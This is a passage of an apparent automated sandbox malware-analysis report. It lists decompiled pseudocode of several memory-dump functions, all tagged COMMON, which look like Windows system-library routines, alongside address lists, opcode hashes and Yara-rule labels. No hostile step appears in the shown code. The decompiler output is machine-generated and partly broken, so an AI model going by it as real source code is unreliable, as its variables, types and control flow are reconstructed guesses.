							goto L5;
						}
					}
				}
			}

0x04659100
0x04659100
0x04659100
0x04659100
0x04659102
0x04659107
0x0465910c
0x04659110
0x04659115
0x04659136
0x04659143
0x046b37e4
0x046b37e4
0x04659149
0x0465914e
0x0465914e
0x04659117
0x0465911d
0x00000000
0x00000000
0x0465911f
0x04659125
0x00000000
0x04659151
0x04659158
0x0465915d
0x04659161
0x04659168
0x046b3715
0x00000000
0x0465916e
0x0465916e
0x04659175
0x04659177
0x0465917e
0x0465917f
0x04659182
0x04659182
0x04659187
0x04659187
0x0465918a
0x0465918d
0x0465918f
0x04659192
0x04659195
0x04659198
0x04659198
0x04659198
0x0465919a
0x00000000
0x00000000
0x046b371f
0x046b3721
0x046b3727
0x046b372f
0x046b3733
0x046b3735
0x046b3738
0x046b373b
0x046b373d
0x046b3740
0x00000000
0x00000000
0x046b3746
0x046b3749
0x00000000
0x00000000
0x046b374f
0x046b3751
0x00000000
0x00000000
0x046b3757
0x046b3759
0x046b375c
0x046b375c
0x046b375e
0x046b375e
0x046b3761
0x046b3764
0x00000000
0x00000000
0x046b3766
0x046b3768
0x046b37a3
0x046b37a3
0x046b37a5
0x046b37a7
0x046b37ad
0x046b37b0
0x046b37b2
0x046b37bc
0x046b37c2
0x046b37c2
0x046b37b2
0x04659187
0x04659187
0x0465918a
0x0465918d
0x0465918f
0x04659192
0x04659195
0x00000000
0x04659195
0x00000000
0x04659187
0x046b376a
0x046b376a
0x046b376c
0x046b376c
0x046b376f
0x046b3775
0x00000000
0x00000000
0x046b3777
0x046b3779
0x00000000
0x00000000
0x046b3782
0x046b3787
0x046b3789
0x046b3790
0x046b3790
0x046b378b
0x046b378b
0x046b378b
0x046b3792
0x046b3795
0x046b3795
0x046b3798
0x046b3798
0x046b379b
0x046b379b
0x046591a3
0x046591a9
0x046591b0
0x046591b4
0x046591b4
0x046591bb
0x046591c0
0x046591c5
0x046591c7
0x046b37da
0x046591cd
0x046591cd
0x046591cd
0x046591d2
0x046591d5
0x04659239
0x04659239
0x046591d7
0x046591db
0x046591e1
0x046591e7
0x046591fd
0x04659203
0x0465921e
0x04659223
0x00000000
0x04659223
0x04659205
0x04659208
0x0465920c
0x04659214
0x04659214
0x046591e9
0x046591e9
0x046591ee
0x046591f3
0x046591f3
0x046591f3
0x046591e7
0x00000000
0x046591db
0x04659187
0x04659168

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb38a56fa08709757c3a55883862d2e79ce804b07098702b897d8ea3d1bfb04
Instruction ID: 4278aad5d5da3c0a6a05ff94624dff4df035a7b5a41a6ff23f4d8c73581211d3
Opcode Fuzzy Hash: ecb38a56fa08709757c3a55883862d2e79ce804b07098702b897d8ea3d1bfb04
Instruction Fuzzy Hash: 3F31D3B5A00264DFEB71EF68C048BACB7B1BB98314F19815AC80467361E335B984CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04681DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04681DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0467F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04674620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0467F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x04681dc2
0x04681dc5
0x04681dc7
0x04681dcc
0x04681dce
0x04681dd6
0x04681ddf
0x04681de0
0x04681de1
0x04681de5
0x04681de8
0x04681def
0x04681df0
0x04681df6
0x04681df7
0x04681dfe
0x04681e1a
0x00000000
0x00000000
0x04681e0b
0x04681e12
0x04681e12
0x04681e00
0x04681e00
0x04681e05
0x04681e1e
0x04681e23
0x046c570f
0x046c5713
0x00000000
0x00000000
0x046c5719
0x046c5719
0x04681e2c
0x04681e2d
0x04681e2e
0x04681e2f
0x04681e31
0x04681e32
0x04681e35
0x04681e3d
0x046c5723
0x046c573d
0x046c573d
0x00000000
0x046c5723
0x04681e49
0x04681e4e
0x04681e4e
0x04681e09
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: df2821d5ec405cf32514a4429624b21129235f5d4fa741869a6f13fa861bb5a0
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 9F219F72600219FFD720DF59CC88EAABBB9FF86744F114159E90197210EA30BE02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04670050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04670050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x474d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04689ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0469B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04728A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04689702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x474b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x04670055
0x0467005d
0x04670062
0x0467006c
0x0467006f
0x04670074
0x0467007a
0x0467007a
0x04670080
0x04670080
0x04670087
0x0467008d
0x0467008f
0x04670093
0x04670095
0x0467009b
0x046700f8
0x046700fb
0x046700fc
0x046700ff
0x04670108
0x04670108
0x046700a2
0x046700a6
0x046700b3
0x046700bc
0x046700c5
0x046700ca
0x046bc01e
0x00000000
0x00000000
0x046bc02d
0x046700d5
0x046700d9
0x046bc03d
0x046bc046
0x046bc046
0x046700df
0x046700e2
0x046700ea
0x046700ef
0x046700f2
0x046700f6
0x04670111
0x04670117
0x04670117
0x00000000
0x046700f6
0x046700d0
0x046700d0
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6d5db90b8ceeb587350b6b9d63d73d6b40e0f0e02a8c139e1fb91e68e228ff
Instruction ID: 4a5cb6cb3589108db3fa1bcf3b9b8cfb6d26370cc671b7c2c93979c01637abb4
Opcode Fuzzy Hash: 9f6d5db90b8ceeb587350b6b9d63d73d6b40e0f0e02a8c139e1fb91e68e228ff
Instruction Fuzzy Hash: 07314A31601A049FD725CF28C944BA6B3E5FF88728F14856DE49687B90EB76BC01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 046D6C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E046D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04677D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4747b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04674620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0469F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04677D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04699AE0();
						_t23 = L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x046d6c0a
0x046d6c0f
0x046d6c10
0x046d6c13
0x046d6c15
0x046d6c19
0x046d6c1c
0x046d6c21
0x046d6c28
0x046d6c3a
0x046d6c2a
0x046d6c33
0x046d6c33
0x046d6c3f
0x046d6c48
0x046d6c4d
0x046d6c60
0x046d6c65
0x046d6c69
0x046d6c73
0x046d6c79
0x046d6c7f
0x046d6c86
0x046d6c90
0x046d6c94
0x046d6ca6
0x046d6cb2
0x046d6cbd
0x046d6cbd
0x046d6cc3
0x046d6cc7
0x046d6ccb
0x046d6cd0
0x046d6cd1
0x046d6ce2
0x046d6ce2
0x046d6c69
0x046d6ced

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a566591f5292635597e81a47c1878a978864a473750c375c8f77d49acde3f6
Instruction ID: 4ea0967954e9578a14555a54b0412de5c8028f61df99f6b45ea66947a3090427
Opcode Fuzzy Hash: f4a566591f5292635597e81a47c1878a978864a473750c375c8f77d49acde3f6
Instruction Fuzzy Hash: 2A21ABB1A00644AFD715DB68D880E6AB7B8FF48704F04406AF804C7791E734ED50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 046990AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E046990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E046AD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0468E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04674620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0469F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0468A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x046990af
0x046990b8
0x046990bb
0x046990bf
0x046990c2
0x046990c2
0x046990c8
0x046990cb
0x046990cd
0x046d14d7
0x046d14eb
0x046d14eb
0x00000000
0x046d14eb
0x046d14db
0x046d14e6
0x00000000
0x046d14f2
0x046d14e8
0x00000000
0x046d14e8
0x046990d8
0x046990da
0x046990dd
0x046990e5
0x00000000
0x04699139
0x046990fa
0x046990fe
0x04699142
0x00000000
0x04699142
0x04699104
0x04699107
0x0469910b
0x04699110
0x04699118
0x04699147
0x04699148
0x0469914f
0x04699150
0x04699151
0x04699152
0x04699156
0x0469915d
0x04699160
0x04699168
0x0469916c
0x046991bc
0x046991be
0x00000000
0x046991be
0x0469916e
0x04699173
0x04699176
0x00000000
0x00000000
0x0469917c
0x04699180
0x046991b5
0x00000000
0x046991b5
0x04699182
0x04699185
0x04699189
0x00000000
0x00000000
0x0469918e
0x04699190
0x04699198
0x00000000
0x00000000
0x046991a0
0x00000000
0x046991ad
0x046991ad
0x046991b0
0x046991b1
0x00000000
0x04699185
0x0469911a
0x0469911c
0x0469911f
0x04699125
0x04699127
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: c36a6db5e27cedc1ece0d217fa83ca305ce1cb6be0dbb6ed0655b880b9b704e2
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: DD217FB1A00304EFDB20DF59C844AAAB7F8EB54314F14886EE945A7310F7B0BD048B90

Uniqueness

Uniqueness Score: -1.00%

Function 04683B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04683B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x47484c4; // 0x0
				_v12 = 1;
				_v8 =  *0x47484c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x47484c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0469AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0469FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x47484c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x47484c4; // 0x0
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x04683b89
0x04683b96
0x04683ba1
0x04683bab
0x04683bb5
0x04683bb9
0x046c6298
0x04683bbf
0x04683bc2
0x04683bc3
0x04683bc9
0x04683bca
0x04683bcc
0x04683bcd
0x04683bd4
0x04683bd6
0x04683bdb
0x04683bea
0x04683bf7
0x04683bfb
0x04683bff
0x04683c09
0x04683c0a
0x04683c0b
0x04683c0f
0x04683c14
0x04683c18
0x04683c18
0x04683bfb
0x04683c1b
0x04683c30
0x04683c30
0x04683c3d

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c5677f9fc892d57ea283b66309a89f036ad5659a3a55fca6c565536704510fb
Instruction ID: cb768a5a86e9020ce905846873dd8184170eaaa7ac845196c95ba408efa68544
Opcode Fuzzy Hash: 9c5677f9fc892d57ea283b66309a89f036ad5659a3a55fca6c565536704510fb
Instruction Fuzzy Hash: 7D21C2B2600108AFD700EF58CD81B6AB7BDFB40708F160169E904AB251E776FD51CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 046D6CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E046D6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04677D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04677D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4635c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0468F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0468F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E046D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04672400( &_v52);
								}
								_t21 = L04672400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x046d6cfb
0x046d6d00
0x046d6d02
0x046d6d06
0x046d6d0a
0x046d6d0e
0x046d6d19
0x046d6d2b
0x046d6d1b
0x046d6d24
0x046d6d24
0x046d6d33
0x046d6d39
0x046d6d46
0x046d6d4f
0x046d6d61
0x046d6d51
0x046d6d5a
0x046d6d5a
0x046d6d69
0x046d6d6b
0x046d6d6d
0x046d6d6f
0x046d6d6f
0x046d6d74
0x046d6d79
0x046d6d7a
0x046d6d7f
0x046d6d82
0x046d6d88
0x046d6d89
0x046d6d90
0x046d6d94
0x046d6da7
0x046d6db1
0x046d6db1
0x046d6dbb
0x046d6dbb
0x046d6d90
0x046d6d69
0x046d6d46
0x046d6dc6

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a5ebddbe12487bdb6da43cbe277db21ddb8b1eeaf859a6095baae4a756f22c
Instruction ID: 8a6cbc31c0e410bdf4f6c33643c079ef7b29e628646cfe125db4307ed2c566c3
Opcode Fuzzy Hash: a9a5ebddbe12487bdb6da43cbe277db21ddb8b1eeaf859a6095baae4a756f22c
Instruction Fuzzy Hash: 7521DE729003449BD321EF68E944B6BB7ECEF95744F04056BF942C7260FB34E909C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 0472070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0472070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E047207DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0471AFDE( &_v8,  &_v12);
					E04721293(_t38, _v28, _t60);
					if(E04677D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E047114FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0472071b
0x04720724
0x04720734
0x04720738
0x0472074b
0x0472074b
0x04720753
0x04720753
0x04720759
0x0472075d
0x04720774
0x04720779
0x0472077d
0x04720789
0x04720795
0x047207a7
0x04720797
0x047207a0
0x047207a0
0x047207af
0x047207c4
0x047207cd
0x047207cd
0x047207af
0x047207dc

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 1476c7794e2ebc99bfa5da8b36613d9887125961b2e4ece276dfeb72507c42cd
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 1A2134363042509FDB05DF18C984B6ABBA9EFC4310F048529FA948B381D730E909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0467AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0467AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04677D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04677D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04677D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04677D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E046D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0467ae78
0x0467ae7c
0x0467ae7e
0x0467ae81
0x0467ae86
0x0467ae8d
0x046c2691
0x0467ae93
0x0467ae93
0x0467ae93
0x0467ae98
0x0467ae9d
0x046c26a2
0x046c26b4
0x046c26a4
0x046c26ad
0x046c26ad
0x046c26b9
0x00000000
0x046c26bb
0x00000000
0x046c26bb
0x0467aea3
0x0467aea3
0x0467aea3
0x0467aeaa
0x046c26c0
0x046c26c9
0x046c26c9
0x0467aeb3
0x046c26d4
0x046c26e1
0x00000000
0x00000000
0x046c26e7
0x046c26ee
0x046c26f0
0x046c26f9
0x046c26f9
0x046c2702
0x046c2708
0x046c2708
0x046c270b
0x046c270f
0x046c2711
0x046c2711
0x046c2725
0x046c2725
0x00000000
0x0467aeb9
0x0467aeb9
0x0467aebf
0x0467aebf
0x0467aeb3

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 3b55dc51595903301f8a5577beec82215ab5d4a00d26772bde7ff53e79814682
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
